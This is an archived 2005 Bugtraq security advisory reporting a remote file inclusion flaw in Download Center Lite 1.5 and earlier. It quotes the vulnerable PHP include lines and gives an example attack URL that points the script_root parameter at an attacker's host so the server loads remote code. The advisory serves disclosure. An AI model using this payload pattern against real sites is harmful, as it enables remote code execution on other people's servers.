| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 4 Mar 2005 17:01:14 -0000
From: Filip Groszynski <groszynskif@...il.com>
To: bugtraq@...urityfocus.com
Subject: Download Center Lite (DCL) - Arbitrary File Inclusion (VXSfx)
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Name: Download Center Lite (DCL)
Version: <= 1.5 (free/commercial)
Homepage: http://www.stadtaus.com/
Author: Filip Groszynski (VXSfx)
Date: 4 March 2005
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Vulnerable code in inc/download_center_lite.inc.php:
...
/*****************************************************
** Include some files
*****************************************************/
include($script_root . 'inc/functions.inc.php');
include($script_root . 'inc/template.class.inc.php');
include($script_root . 'inc/log_downloads.class.inc.php');
include($script_root . 'languages/language.' . $language . '.inc.php');
...
--------------------------------------------------------
Example:
if register_globals=on and allow_url_fopen=on:
http://[victim]/[dir]/inc/download_center_lite.inc.php?script_root=http://[hacker_box]/
--------------------------------------------------------
Fix and Vendor status:
Vendor has been notified.
--------------------------------------------------------
Contact:
Author: Filip Groszynski <VXSfx>
Location: Poland <Warsaw>
Email: groszynskif <at> gmail <dot> com
HP: http://shell.homeunix.org
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Powered by blists - more mailing lists